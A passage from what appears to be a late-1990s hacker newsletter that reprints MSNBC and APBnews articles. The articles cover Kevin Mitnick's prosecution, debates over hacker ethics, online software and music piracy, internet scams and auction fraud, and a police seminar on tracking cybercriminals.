in jail since February 1995, first serving time for breaking probation on an earlier conviction and fleeing authorities. Authorities repeatedly argued against granting bail to Mitnick, charging that his technological wizardry posed a serious threat to the public. CAPTURED IN NORTH CAROLINA Mitnick, who spent 2 1/2 years on the run before his 1994 capture by federal agents in North Carolina, arguably is the world’s most notorious hacker, the subject of numerous books and a soon-to-be-released film. His long wait in jail also has made him a hero and a martyr to other hackers and “crackers,” the former’s preferred term for those who aim to profit by breaking into computers. They say his lengthy wait without a trial was an attempt to intimidate other would-be hackers. “When you realize that you have to wait 3 1/2 years for a trial, even if you’re innocent you’re going to plead guilty,” Eric Corley (a k a Emmanuel Goldstein), editor of 2600 — the Hacker’s Quarterly, told MSNBC last year. But government attorneys call the case as a by-the-book prosecution of a repeat offender who just happens to be a notorious hacker and deny that he is being singled out. "He is being prosecuted because he violated the law,” said Chris Painter, an assistant U.S. attorney. “… He violated a lot of laws. “Is it true that computer hackers should think twice before violating the law? Yes, it is our position they always should do that. … But Kevin Mitnick is not being singled out.” WON RIGHT TO USE LAPTOP Because most big hacking cases have been settled prior to trial, Mitnick’s case had been expected to set numerous legal precedents. But despite repeated avowals through his attorney to take his case to trial, Mitnick agreed to the plea bargain nearly four years after he was jailed. Still, Mitnick blazed a small legal trail by winning the right to use a laptop computer at the jail to review the mountain of electronic evidence the government has compiled against him — enough data to fill a library if it were printed out, Randolph said. During numerous hearings on the matter, prosecutors urged Judge Pfaelzer to deny Mitnick access to a computer at the jail — even one without a modem — arguing that he could somehow use it to engineer an escape or otherwise compromise security at the jail. The judge sided with the prosecution during a series of hearings on the matter but reversed course in March 1998 and allowed Mitnick to review evidence on a laptop in the jail’s attorney-client conference room. The two sides then spent months wrangling over procedures for the review before Mitnick was allowed to begin poring over the computer files in January. That was virtually Mitnick’s lone success in pretrial legal skirmishes. Motions to set bail for him were rejected by the judge, who agreed with prosecutors that he was a flight risk and posed a danger to the public. The denial of bail was upheld by the 9th Circuit Court of Appeals in San Francisco. Nor did the defense have any success in persuading Pfaelzer to allow the defendant access to encrypted files or “hacking tools” that prosecutors say were in his possession when he was arrested. A CAUSE CELEBRE The perception that Mitnick is being harshly treated by the government has made his case a cause celebre among hackers and Internet libertarians. There are numerous Web sites devoted to his legal battle and scores of Web sites have been altered by sympathetic attackers to include calls for his freedom, notably the UNICEF and Yahoo! home pages. Mitnick and his capture have been documented in several books — most notably “Takedown” by New York Times reporter John Markoff and Tsutomu Shimomura, the computer security expert who helped the government track Mitnick down, and “The Fugitive Game — Online with Kevin Mitnick,” by Jonathan Littman. Adding to his notoriety is an upcoming feature film of “Takedown,” which is expected to open later this year. The film, which is being produced by a division of Disney’s Miramax Films, will star Skeet Ulrich as Mitnick. An early version of the script drew howls of outrage from Mitnick supporters because of numerous liberties taken by the writers in the interest of creating dramatic tension. Among the untruths: During the pursuit, Mitnick clubs Shimomura with a garbage can lid, gashing his head (they never met until after Mitnick’s arrest); he obtains free phone calls by whistling into the phone a la legendary phone phreaker Captain Crunch; he rigs a radio call-in contest to win a TV, a stunt performed in real life by fellow hacker Kevin Poulsen; near the end of the movie he vows to escape during a jail conversation with Shimomura, saying, “I’ll be seeing you. All I need is a dime and a phone. Sometimes, if I’m lucky, I don’t even need the dime.” The Associated Press contributed to this report. -=- Hackers: Knights errant? or knaves? By Mike Brunker MSNBC July 23 — Emmanuel Goldstein, editor of 2600 — The Hackers’ Quarterly, says hacking is about “learning, sharing information, being the first person to discover something.” To Marcus Ranum, CEO of a network security firm, breaking into someone else’s computer means “sheer mental and emotional anguish” for the victim. Strangely, depending on the circumstances and the individuals involved, they are both right. HACKERS ARE the knights-errant of the Internet Underground, wandering the byways of cyberspace in search of adventure, mischief and — in some cases — somebody else’s treasure. But their reasons for embarking on an avocation that carries plenty of baggage with it are as diverse as the Internet itself. What is clear is that there are many more hackers than there used to be. The Computer Security Institute, in a recent survey of computer crime, found a 16 percent increase in security breaches of corporate computer systems over the previous year, more than half of which were accomplished via the Internet. The FBI now has roughly 500 computer crime investigations open at any given time. And the experts agree, these statistics reflect only the thinnest slice of the hacking phenomena. INSIDERS MOST LIKELY CULPRITS Most security breaches are still committed by insiders — dishonest or disgruntled employees in most cases — but outside intrusion is on the rise. The statistics are capable of striking fear into the hearts of those intent on building the Internet into a mighty machine of commerce, but they hold promise for at least one sector: Dataquest estimates the market for computer security will grow into a $13 billion business by 2002, up from $6.3 billion in 1997. The computer- and network-security experts find themselves confronted by a highly resourceful enemy that can assume many guises. Goldstein, whose real name is Eric Corley, is a leading spokesman for the “Jacques Cousteau School of Hacking,” representing those hackers who revel in the cerebral, exploratory aspects of the craft. "What hacking is about is learning, sharing information, being the first person to discover something, being the first person to try defeating a system in a different way,” he said. “The thing with hackers is we don’t keep secrets, we share information. THE CASE FOR HACKING “If hacking did not exist, people would not discover the mistakes, the basic ways that a system can be compromised until it was too late, until someone with an agenda had actually gotten in there and done something bad for a purpose. Hackers get in there and they tell everybody what they did.” These hackers believe authorities and the media have unfairly stigmatized them by failing to make the distinction between hackers, who are essentially trespassers, and computer criminals. The latter, known as “crackers,” to the nondestructive hackers, break into systems to steal or wreak havoc. “I believe the crime of simply hacking a system should be illegal in the same way it would not be legal to wander through my house. It’s kind of the same issue,” said a hacker known as Lucifer. “I do think the punishment typically outweighs the crime. Typically, a breaking-and-entering conviction [in the real world] will get you a suspended sentence, while burglary is treated much more seriously. I think the same should apply.” Unfortunately, problems can arise when hackers’ explorations have unintended consequences, as was the case last year when a juvenile hacker who broke into a Bell Atlantic network inadvertently shut down communications between the control tower and aircraft at the Worcester, Mass., airport. Fortunately there were no crashes. SUFFERING IGNORED, CRITICS SAY The high-minded hacker ethic also ignores the considerable human suffering that even the most benign break-in can create, says Ranum, CEO of Network Flight Recorder, which creates security tools for network managers. “This isn't fun stuff, he said. “There is real damage. … You get some system or network manager who works up on Wall Street and his systems have been broken into … by one of these barely post-pubescent hackers and they’re scared for their jobs, they’re afraid they’re going to lose their careers, they’re worried about their mortgages. I’ve seen grown men reduced to tears by this kind of thing. It’s just not right.” The natural tension that exists between the hackers and those charged with either preventing them from breaking in or catching them once they do is understandable. But it tends to obscure the fact that the hackers who are most feared are not the ones who call attention to their exploits or bait the security experts. “I worry about the ones that you never see and you never hear, because they’re not driven by ego,” said Michael Higgins, vice president for operations and technology with Global Integrity Corp., an international security firm. “ … In my line of business. they’re usually driven by the almighty dollar, which means that they’re somehow causing fraud or they’re causing extortion events and they’re making money.” -=- Online thieves collide with the law A look at how copyright theft is being handled in the courts By Bobbi Nodell MSNBC July 23 — While the Internet yearns to be a free-wheeling exchange of information, corporate America is beginning to chase down those who circulate copyrighted material on the Internet without paying dues. Companies have hired digital detectives to locate sites violating the U.S. Copyright Act, and then, using threats or legal action, have forced the operators to remove the material. Here’s a look at the efforts — in the boardrooms and in the courtrooms — to crack down at online theft. WITH AN ESTIMATED 300 million web sites, policing illegal activity is a never-ending chore. Christopher Young, president and chief operating officer of Cyveillance based in Alexandria, Va., says that his company has uncovered 100,000 violations since it was formed 1 1/2 years ago to search for illegal sites. Young said the violations his company has uncovered run the pilfering gamut — including theft of statistics from the National Basketball Association site, trading nude photos of Pamela Anderson, downloading copies of Windows 98, stealing Madonna’s new album before it was released, or taking a Nike logo and illegally representing the web site as that of a Nike dealer. ”[And] don’t even get me started on rumors and opinionated information on companies” posted on bulletin boards and in chat rooms, he said, saying that such false information meets the legal definition of slander. Michael Overly of the Los Angeles law firm of Foley & Lardner, said while there is no specific statutory law directed at copyrighted material online, courts are addressing the issue in piecemeal fashion in a number of cases. “In some areas of the country there is no direction, while in others there’s been conflicts in the law,” he said. One of the main questions at issue is how to clarify copyright protections for the online world. For instance, should Internet service providers [ISPs] be held liable for something a subscriber posts on-line? Under the U.S. Copyright Act, an ISP technically could be held liable, though a number of courts have resisted that interpretation, Overly said. In 1996, for example, the Church of Scientology sued Netcom after the ISP refused to remove church writings posted on its computer network by a former Scientologist minister. The church argued that the doctrines were copyrighted material and Netcom should be held responsible for copyright infringement. However, a federal judge in California ruled that Netcom was not liable, even though it was partly responsible for the material being illegally published by refusing to remove it after receiving notification from the church. FEARS OF OVERREACTION While there is general agreement that online theft is a problem, some think companies are destroying a good thing by becoming overly aggressive in their attempts to root it out. “There’s a Salem witchhunt going on out there saying that this is something worse than it really is,” said Jon Noring, the founder of OmniMedia Digital Publishing, an online book publisher and himself a victim of cyber theft. “It could lead to Congress passing much more Draconian laws which could have a serious effect on free passage of information.” He said he is especially concerned that the Software Publishers Association is trying to create a “police state” by overzealously guarding copyrighted software. While a far cry from totalitarianism, there have been a number of attempts on the national front to crack down on online theft: After a MIT student created a site encouraging web surfers to steal software and computer games, lawmakers scurried to toughen up the copyright act to create certain criminal penalties for copyright infringement — even if the offender does not benefit financially, said Dallas attorney Craig Weinlein. The result was the “No Electronic Theft Act” signed into law by President Bill Clinton on Dec. 16, 1997. The U.S. Copyright Act of 1976 was amended in 1995 to protect the transmission of a digital performance, therefore if someone plays music over the Internet without proper authorization, they could run afoul of this act. Now many companies are rallying behind a new bill - the Digital Millenium Copyright Act (HR 2881) - that addresses several new areas of copyright theft. Most important, it would exempt online service providers from copyright liability for simply transferring information on the Internet. It also would make it illegal to develop software that would disable encryption included on software and CD-ROMs intended to prevent people from copying the work. The bill passed the Senate but was blocked in the House by the library coalition and is still waiting to be voted on. Controversial legislation also is pending to protect information databases from being appropriated. Currently, if someone compiles baseball statistics, for instance, that information is not protected. The Collections of Information Anti-Piracy Act, sponsored by Rep. Howard Coble, R-N.C., was passed by the House, but few think it will pass the Senate, where it has encountered opposition from researchers and others who worry that once this material is copyrighted, it won’t be available to the public. Other areas still need hashing out, including how efforts to prevent copyright infringement might themselves infringe on privacy. For example, many companies are turning to digital “watermarks” — an electronic code — to track copies of their software, sound recordings, books or photos. But some Internet libertarians worry that these companies also will use the technology to track and assemble information on the customers who purchased the material. Also under debate is the online definition of “fair use” under Section 107 of the U.S. Copyright Act. Saying the copyrighted material is not for profit, is no longer a shield, as many schools have been prosecuted for copyright infringement, point out lawyers. The key, for lawmaker, is knowing where to draw the line. “We don’t want to legislate the Internet out of existence by making laws too strict,” said Overly. “In the United States, we have a tendency to rush in and legislate before we know what’s going on with new technology.” MSNBC’s Molly Masland contributed to this story. -=- Sound Waves: A digital battleground how the music industry is dealing with net pirates. By Bobbi Nodell MSNBC July 23 — Sound waves have become one of the hottest battlegrounds on the Internet these days. With the advent of new compression technology, people can now download sound files in moments, store them on a hard drive or record them on a compact disc using a CD recorder, which can be purchased for $300. THOUSANDS OF SITES offer near CD-quality sound recordings, so it’s possible for some music enthusiasts to bypass the music store altogether. For music pirates, the technology is almost a license to steal. Three months before its official release, Pearl Jam’s entire “Yield” album was posted online. Madonna’s new album “Ray of Light” made it to the Web months before its release. So did Alanis Morrissette’s new song, “Uninvited,” part of the soundtrack for the film “City of Angels.” The Internet is full of “tribute sites” that offer vast electronic libraries dedicated to specific artists and one unofficial study found more than 1,800 digital jukeboxes. Some digital pirates charge consumers to download the music but others offer it for free and are brazen about what they are doing. One music archive site said, “Leech what you’d like. I don’t care. Just be nice and upload something for others.” Another begged Web surfers to “take but don’t tell.” RECORDING INDUSTRY STRIKES BACK Fearful of the future, the music industry is responding with a vengeance. The Recording Industry Association has already issued 750 warning letters to offending web sites and launched five major lawsuits charging federal copyright infringement — three were settled in January and two of the cases are still pending, said Steven D’Onofrio, executive vice president of RIAA. The association represents the companies and people who work in the $12 billion recording industry. “This is a growing problem and we are greatly concerned about it,” he said. Reproducing and distributing copyrighted sound recordings without authorization is a violation of federal copyright laws. While a portion of a music clip can be used under the “fair use” terms, it’s not OK to use copyrighted material without the proper permission — no matter what kind of disclaimer is put on the site. D’Onofrio said he’s not sure how much of the $300 million lost every year to music pirates is from online theft but it’s enough for his group to take notice. He said the music industry would rather avoid lawsuits and focus on education. It has teamed up with several universities and launched a “Soundbyting campaign” to educate students not to download digital recordings from illegal music archive sites. Many of these sites are operated by students on university servers using a technology called MP3, which allows computer users to shrink audio files from compact discs without losing any noticeable sound quality. The CD-quality files can be played on a computer with one of the many free MP3 players found on the Internet. A trip around the Internet using the search term “MP3” shows how large the problem is. On a recent Alta Vista search, MP3 had more than 325,000 hits, many of them offering bootleg versions of songs. The association ferrets out these illegal sites with a staff of digital detectives as well as an automated Web crawler. While thousands of these sites still exist, the recording industry is gaining some ground. D’Onofrio said every site it has contacted has pulled the offending material or closed its site. And the courts have come down on the side of the recording industry in three cases so far, awarding $100,000 in damages for each infringed sound recording identified in the complaint — representing damage awards totaling more than $1 million against each defendant. The recording industry, however, deferred collecting the damages as long as the sites refrain from posting copyrighted material. To help the industry’s cause, the No Electronic Theft Act was passed in November 1997. Among other things, the act criminalizes copyright infringement, even if there is no financial gain. But it’s not just the recording industry that’s fighting back. OTHERS ON THE PROWL The American Society of Composers Artists and Publishers, which represents 75,000 songwriters and publishers, is going after anyone streaming music on the Internet without a license. Marc Morgenstern, senior vice president of new media for the society, said that unlike artists, who make most of their money from record sales, songwriters profit from the performing rights. His group also has a team of people who surf the Web and find offending sites. Most of the time, he said, they contact the site and get them to take the material down but he said the group brought a lawsuit once and settled for a $250 license fee. The license fee is based on the site’s revenue. The National Music Publishers Association , which represents more than 17,000 music publishers, is issuing its own slew of cease-and-desist orders. It is also interested in the lyrics and musical notations from copyrighted material. One of its most public efforts has been its battle against the Online Guitar Archive, OLGA, which has a library of some 33,000 guitar tablatures. The site has a search engine that allowed users to search the databases for a popular song and see how to play it using tabs, which teach guitarists how to play the song by showing people where the put their fingers. While printed music is put out by the music publishers, the tabs on OLGA are written by other guitar players. OLGA, a site started in 1992, was an outgrowth of Usenet groups and has a loyal following around the world, getting some 50,000 hits a day when its archive was up. It shut down in early June and won’t reappear until it reaches an agreement with the Harry Fox Agency, said John Nielands, public relations director for the site. He said the site has received over 30,000 letters from users asking the agency to back down and he said over 35 volunteer attorneys have offered to prepare a legal brief arguing that the tabs meet the definition of fair use. Meanwhile, 15-20 mirror sites around the world have popped up in defiance of the order. The OLGA shutdown follows a similar dispute between Warner Bros. and another tablature site, Guitartabs.com, that led the site to remove its tabs in May. As for printed sheet music — a $600 million business worldwide — some companies are turning to digital watermarks that embed a code in their material that makes it easier to track down for infringement. Seattle-based Sunhawk Corp., a digital music publisher and online sheet music store that has signed contracts with Warner Bros., offers several thousand song titles with digital watermarks that tell them who purchased the material. Downloadable audio samples are also encrypted so only one user can hear the music played without purchasing it. “I think this is the future of how printed music is going to go,” said the company’s chief executive officer Brent Mills. His view is that the OLGA site is illegal but he said its popularity points out how huge the market is for online sheet music. -=- Software piracy a booming Net trade ‘You can go anywhere ... steal anything you want,’ official says By Molly Masland MSNBC July 23 — Their names are often obscure — Zorgok’s Lair, the Legion of Krypt, XorcistX — and transient, changing without warning. They don’t do public relations, many don’t make money and their ‘proprietors’ are often still in their teens. The business of online software piracy has increased dramatically in recent years, vexing legitimate software makers. “WHAT DO YOU want to pirate today?” reads a banner at one of the many sites that can be found by nearly any user doing a basic Internet search for the word ‘warez,’ the online term for unlicensed programs. “The Internet lends itself to piracy,” said Peter Beruk, director of anti-piracy for the Software Publishers Association, a trade group based in Washington, D.C. “You can go anywhere you want, buy anything you want, and steal anything you want.” The Internet, too, has fostered the demand for cheap software and the development of high-speed modems capable of quickly downloading large programs. Written in a variety of languages, including Russian, Vietnamese and German, some sites provide software for free or trade while others charge a fee. INDUSTRY LOSSES According to the software industry, piracy is not only a violation of copyright laws but a crime that costs manufacturers millions annually in lost revenue. A study published in June by the Business Software Alliance, which represents software vendors, and the Software Publishers Association, said the industry loses more than $11.4 billion a year worldwide to piracy. Although the group estimates that over 25 percent of software applications in the U.S. are pirated, the problem is far worse in developing areas of the world such as Southeast Asia and Eastern Europe, where piracy rates are said to hover as high as 95 percent or more of all applications in use. “You’ll see just about every program that’s popular being offered and downloaded on the Internet,” said Bob Kruger, vice president of enforcement for the Business Software Alliance. “These people don’t appreciate the fact that what they’re doing inflicts injury on people. They think it’s a victimless crime, but it’s not.” DEBATE OVER COSTS While software piracy undoubtedly costs manufacturers revenue, some argue the figures are overblown. They claim the statistics are inaccurate because they discount the fact that many people who use pirated software would not have purchased a licensed copy in the first place. “The numbers are very misleading,” said Jon Noring, founder of Omnimedia Digital Publishing, an online distributor of electronic books. “They’re right if you simply multiply the number of pirated copies by their selling cost. But the issue is really that in a piracy free world, what percentage of those copies would actually have been bought?” Two years ago, Noring himself was the target of a software pirate who cracked his security code for the Kama Sutra, one of the more popular books offered by Noring’s company, and made it available over the Internet for free. Omnimedia charges a fee to download the complete copy of a book. At first, Noring was concerned the breach would impact sales; two years later, he said he’s seen “absolutely no net effect whatsoever.” Noring argues that some users, including many in developing countries, cannot afford to buy licensed software and would not have purchased it if they didn’t have access to a pirated copy. As one user from Singapore wrote in an online newsgroup, “Many Singaporeans support software piracy. Singaporeans know that it is morally wrong…so there’s no need to educate us. It’s those software companies that need to be educated. If they lowered their software prices, Singaporeans would be willing to buy the originals. Anything more than $30 for the original is daylight robbery for us.” For many users, especially teens and college students, collecting pirated software has become a compulsive hobby. While no software pirates contacted by MSNBC would comment on the subject, Noring says many do it for fun. “They get a rush and an excitement out of it,” he said. “Their disks are piled with the stuff but it’s not on their computers. They just have it. It’s like collecting the whole set or something.” COPYRIGHT VIOLATION Regardless of the debate over costs or the reasons why people use unlicensed programs, software piracy remains a crime under federal copyright laws. The U.S. Copyright Act gives the owner of a copyright the exclusive right to control the reproduction or distribution of a particular work. Anyone who distributes the work without permission of the owner violates the law and is subject to damage awards up to $100,000 per copyrighted work, or actual damages suffered by the owner if they can be proven. “If somebody has one piece of software posted on a Web site, that may not warrant a civil suit or referral for criminal prosecution,” said Kruger. “But if you have somebody running a mail order business and advertising on the Internet, we want to have that site shut down and the operators prosecuted.” In order to counter the efforts of online pirates, investigators try to identify a particular site’s Internet service provider and have the site disconnected. Often the sites provide their ISPs with false names and addresses, making it difficult, if not impossible, to track them down. HARM TO USERS? Although supporters of piracy may argue it’s harmless and actually does people a favor, others point out that piracy hurts not just manufacturers but also users who download it. “There are a number of benefits you get when you purchase legal software,” said Kruger. “You get guarantees that it’s virus free and will operate as it’s supposed to. You also get technical support, a manual and access to upgrades. If you download it from the Internet, you get none of these things.” In addition, pirates need a place to store their ‘warez’ and often surreptitiously hijack third party servers to use as storage sites. This problem is especially acute at universities. According to Beruk, software pirates are most commonly high school or college students with access to servers where they can store large quantities of programs. Campus servers often become the unwitting hosts for bundles of illegal software. One of the more dramatic cases Beruk has been involved in was at Andrews University, a small liberal arts college in Michigan. Campus tech support noticed that one of the university’s main servers was running at close to 90 percent capacity. After removing two ‘warez’ sites, the server’s capacity was back down to 20 percent. “Those two sites by two college students were taking up 70 percent of the university’s server, ” said Beruk. “That tells you how much software is being uploaded and downloaded on a regular basis. It tells you just how big the amount of traffic in illegal software really is.” -=- Age-old scams find new home on Net Problem is ‘expanding exponentially,’ FTC attorney says By Adam Snyder SPECIAL TO MSNBC July 23 — A certified public accountant and by his own estimation “no dummy,” Barry Wise first heard about the Fortuna Alliance — a promising investment opportunity being advertised on the Internet — from a colleague in April 1996. That same evening, he visited the Web site and read about “a unique mathematical formula” called “The Fibonacci Sequence,” whereby each member could earn up to $5,000 per month, in perpetuity, as soon as he or she had recruited 300 new investors. REASSURED BY quotes on the site from dozens of satisfied customers and by a 90-day money-back guarantee, he mailed the Web site’s operators a check for just less than $5,000. Unfortunately for Wise and other soon-to-be-dissatisfied customers, the Federal Trade Commission had not yet concluded its investigation of the Fortuna Alliance. The following month, the agency asked a federal court to shut down the site, which it said was advertising a classic pyramid, or “Ponzi,” scheme and to order its operators to pay restitution to investors. Because of the agency’s action, Wise recovered about $3,000 — or close to 60 percent of his investment — though it took a year before he received his partial repayment from a claims administrator established by the FTC. On Wednesday, July 22, the FTC announced it had finished mailing more than $3 million in checks to people in 70 countries who were defrauded by Fortuna. Since the crackdown on the Fortuna Alliance, the FTC has taken similar action against 36 Web sites engaged in all types of con games — everything from fraudulent land deals and work-at-home schemes to bogus charities and crooked contests. They all boil down to a single ruse, says Susan Grant, director of the National Fraud Information Center: convincing victims to part with their money without having to deliver anything of value in return. “The fact that the Internet has made it possible for anyone to communicate with anyone else has lowered the barriers for being in business,” she said. “That’s obviously a good thing for small entrepreneurs. But it’s also provided a bonanza for scam artists.” Most Internet frauds are “old-fashioned scams dressed up in high-tech garb,” FTC Chairman Robert Pitofsky testified during Senate hearings on Internet fraud in February. But the nature of the Internet makes these age-old scams easier to spring. Before the Internet, peddlers of get-rich-quick schemes in search of suckers had to operate expensive mass-mailing campaigns or banks of telephones. Today, with a single keystroke, a scam artist can send e-mail to tens of thousands of online targets. FOUR BASIC SCAMS Experts charged with weeding out Internet fraud say almost all online scams fall into four categories: Pyramid scheme: “Turn $5 into $60,000 in just four weeks” is most likely a come-on to an age-old “pyramid” or “Ponzi” scheme. Like the Fortuna Alliance scam, participants can only make money by recruiting new suckers, creating a “pyramid” that collapses like a chain letter as soon as no new “investors” can be found. Such pyramid schemes are illegal on or off the Internet. Risk-free investment: There may be such a thing as a risk-free investment, but buying shares to help finance the construction of an ethanol plant in the Dominican Republic, which is what IVT Systems promised last year would generated a return of 50 percent or more, is not one of them. Nor are the countless other “risk-free” offerings on the Internet. After the SEC filed a complaint, IVT stopped advertising on the Internet. Phone scams: Like many Internet scams, this is just a variation of one that has been around for years but which has found new life with the easy communications made possible by e-mail. You receive an e-mail urging you, by name, to call a telephone number in the “809” area code. Typically the incentive is that you’ve won a contest or sweepstakes. But “809” is actually the area code for the Caribbean, and the call will show up on your next phone bill at a rate of up to $20 per minute. Top 10 Scams As Federal Trade Commission Chairman Robert Pitofsky once said, Internet frauds are "old-fashioned scams dressed up in high-tech garb." But that doesn't mean they're easy to spot. -=- Scam combines e-mail, overseas call FTC says its new Internet fraud unit is hot on con artists’ trail By Mike Stuckey MSNBC May 18 — Internet con artists are pairing e-mail with overseas telephone numbers to fleece unwitting U.S. consumers, federal authorities said Tuesday in announcing a crackdown on the scam. ‘That’s a good little scam.’ — IAN OXMAN Spam Recycling Center HERE’S HOW it works: Net users receive e-mail from a phony company advising them that “we have received your order.” The e-mail recipients have no memory of placing such an order, but the note includes an official looking “confirmation number” and the startling news that anywhere from $300 to $900 will be billed to their credit cards. Any questions? A telephone number offers help. The number actually goes to a phone-sex line in Dominica, an island nation in the Caribbean’s West Indies. Call it, and you’ll wind up with an unexpected charge on your next phone bill. “That’s a good little scam,” said Ian Oxman of the Spam Recycling Center, a group that helps federal authorities and others track and fight junk e-mail. In a first-of-its-kind action against so-far unknown perpetrators, the Federal Trade Commission’s newly formed Internet Fraud Rapid Response team has won a court order against the con artists. The action orders the perpetrators to stop the scam and prevents telephone carriers from remitting funds to the company behind the West Indies number, the FTC’s Eileen Harrington told MSNBC. The FTC's Eileen Harrington explains how telephone funds were frozen in the case. Harrington, the FTC’s director of marketing practices, said the FTC team — two attorneys and a researcher — is confident it will learn who is behind the e-mail and win a judgment against them. “I don’t think it will take very long, she said, adding that evidence gathered so far shows “the perpetrator is probably in the United States.” The FTC began investigating the scam about three weeks ago as the result of some of the 10,000 consumer complaints it receives each month, said Harrington. America Online users were particularly hard hit, according to the FTC. Another big e-mail provider, Yahoo!, got no complaints, an employee said. Checks with telephone carriers showed that traffic to the West Indies number increased by “thousands and thousands” in March alone, Harrington said. CHARGES VARY Many who called the number saw it result in a $1.50 to $2 charge on their bills, Harrington said. Of course, if they stayed on the line longer, the charge was more, and she suspects a number of people called it twice, thinking they had misdialed the first time. “It never ceases to amaze me how clever people can get when it comes to being underhanded,” said Oxman. One bright spot for consumers, according to Harrington: While “it may be that the crooks are getting come benefit from technology … well, we’ve got some benefits, too.” With the rise of the Web and e-mail as information sources, the FTC is learning of scams “almost at the same time the consumer sees them.” As a result, “these are going to be rapidly brought cases. We want to do these cases in days and weeks,” she said. -=- The goods, the bids — and the ugly Some buyers are getting hammered at online auction sites By Adam Snyder SPECIAL TO MSNBC July 23 — Biologist William Porter made dozens of purchases in Internet auctions, mostly adding to his GI Joe collection, before deciding to upgrade his computer. His bid of $615 on a brand new Pentium 90 system was accepted, but the crooks never delivered the goods. “I still buy things from Internet auction sites, but I won’t be making such an expensive purchase again, at least not if they demand payment in advance,” a rueful Porter said. “IT’S ONE THING to risk $10 or $15. It’s another to get ripped off for $615,” he said. Porter, a Maryland resident who sent his check to a California address, is a member of a growing fellowship of consumers who have discovered that the issue of trust is paramount when patronizing the garage sales of cyberspace. Auction sites are a fast growing commercial sector on the World Wide Web, offering people all over the world the chance to bid on merchandise that would otherwise be far beyond their geographic reach. The vast majority of the transactions go off without a hitch, but the hectic hives of e-commerce also present criminals with a perfect venue to do their bidding. There are as many as 1,000 auction sites on the Web, matching sellers of everything from fine wines and rare coins to used cars and yesterday’s fishing gear with interested buyers. The highest bid wins the item, with the auction sites usually charging a small fee (often as low as 25 cents) and 5 percent of the sale fee. CATERING TO NICHES Many of them cater to specific niches, such as Winebid.com or Philatelists.com, but others are like galactic-scale general stores. EBay, which acted as middleman in Porter’s attempt to purchase a computer, is the industry leader. It sold more than $100 million worth of every kind of merchandise during the first quarter of 1998, and according to the ratings firm Media Metrix is now one of the five most visited shopping sites on the Web. Another leading online auction house, Onsale, has a registered customer base of more than 500,000 and has placed more than a million orders since its launch in May 1995. Fraud is not a problem at auction houses like Firstauction, a subsidiary of the Home Shopping Network, and other Web retailers that own the merchandise that they sell directly to their customers. But sites that simply match buyer and seller offer a jilted would-be buyer little recourse. Porter waited two weeks before inquiring by e-mail about the whereabouts of his computer. After a few exchanges, the seller stopped responding to his queries and the telephone number he had been given just rang and rang. In the end all he could do was post a warning on EBay to warn other buyers. FTC URGES STANDARDS Concerned about the problem of auction rip-offs, the Federal Trade Commission called a meeting in late May with executives from the top Internet auction sites — including EBay, Up4sale , Auction universe,Haggle onlineand Auction addict — and urged them to adopt a voluntary code of conduct that would help prevent fraud. But the auction operators were noncommittal. “The short answer is that they were interested in making money,” said an obviously frustrated Paul Luehr, one of the FTC attorneys who attended the meeting. “I can’t say that I spend more than 15 minutes a week thinking about fraud,” acknowledged Meg Whitman, president of EBay. But Whitman and other online auctioneers say they have already taken measures to combat fraud. For one thing, most have feedback systems that warn buyers of problem sellers. EBay, for example, assigns a plus 1 for a positive comment and a minus 1 for a negative comment. Anyone accumulating a score of minus 4 or lower is barred from the system. In an effort to prevent thieves from preying on their clientele, most auction sites also require anyone with an anonymous e-mail — a Hotmail or Yahoo address, for example — to register with a credit card. Such measures are by no means foolproof, however. Fraudulent sellers will often adopt multiple e-mail accounts that allow them to switch identities at will. And criminals who prowl the auction sites can use fraudulent credit cards to establish legitimate-appearing accounts. ONLINE SHILLS A DANGER Shills represent another danger to the unsuspecting bidder. Most auction houses have rules against bidders in cahoots with the seller making bids for the sole purpose of driving up the price. But such tactics are virtually impossible to identify online, observers say. “In a private sale, there’s not much someone who is cheated can do,” said Susan Grant, director of the National Fraud Information Center. “It’s not like responding to a local classified ad or buying something at a tag sale from the guy down the road, in which case you can drive to the seller’s house or take a trip to the local courthouse.” Auction Universe, owned by Times Mirror Co., tries to mitigate this problem by partnering with local newspapers and attempting to match buyer and seller within the same geographic area. “We sell a lot of cars,” said President and CEO Larry Schwartz, “and almost all of them are sold to someone locally. We have no more than three or four complaints per month.” The National Fraud Information Center, the FTC and online auction sites themselves offer recommendations on how to avoid becoming a victim of an unscrupulous seller. These include paying close attention to the site’s evaluation system, paying with a credit card whenever possible and using an escrow agent for large transactions. Some sites provide links to several such agents who, for a small fee, will hold the money until the goods are delivered. FTC TAKES ACTION But the FTC is not yet convinced that the voluntary guidelines currently in place are enough of a deterrent to fraud and is becoming more aggressive in going after auction house scam artists. In April, it took action against Craig Hare of Lake Worth, Fla., who, according to the FTC complaint, used online auction houses to offer new and used computers for sale. Then after the winning bidders paid as much as $1,450 per computer, Hare provided neither the merchandise nor a refund. Neither Hare nor his attorney could be reached for comment. The FTC is investigating other auction scammers who systematically float from one auction house to another, defrauding consumers. The agency also says it could take action against the auction sites if the industry’s problems worsen. “The test would be if we determined that an auction site was engaged in ‘unfair and deceptive practices,’ ” said Lisa Hone, an FTC staff attorney. @HWA 41.0 Cops Receive Info on Internet Crime Fighting ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Evil Wench An all-day seminar on "Law Enforcement and the Internet" was recently held in New York and sponsored by Law Enforcement Internet Intelligence Report. The seminar covered topics such as tracking e-mail messages to how to spot malicious activity to the legal pitfalls in preparing subpoenas and search warrants. APB Online http://www.apbnews.com/cjprofessionals/behindthebadge/1999/10/26/seminar1026_01.html Cops Get Lesson in Cyber-Sleuthing Taught to Track E-mail, Crack Hackers, Win Subpoenas Oct. 26, 1999 By David Noack TARRYTOWN, N.Y. (APBnews.com) -- When fighting Internet crime, investigators should use all the same investigative methods they use in the brick-and-mortar world. After all, cyber-crooks leave behind clues and patterns just like traditional criminals, experts say. With that said, Detective Eric Lundberg, a high-tech crime expert from the Massachusetts Attorney General's Office, turned his attention to the 150-person law enforcement audience gathered here recently. They were attending an all-day seminar on "Law Enforcement and the Internet" held by the Law Enforcement Internet Intelligence Report, a Boston-based newsletter covering the Internet and law enforcement. The would-be cyber-sleuths were briefed on everything from the fine points of tracking e-mail messages to how to spot computer hackers to the legal pitfalls in preparing subpoenas and search warrants when going after computer criminals. E-mails leave cyber-footprints Lundberg detailed his tactics for identifying a cyber-criminal when there is nothing to go on but an anonymous and threatening e-mail message. While it seems complicated, Lundberg stressed that searching for the true identity of e-mail is a process of backtracking, since e-mails actually leave cyber-footprints. E-mail is initially composed on a user's computer and then sent to a mail server computer, which is typically located at an Internet service provider such 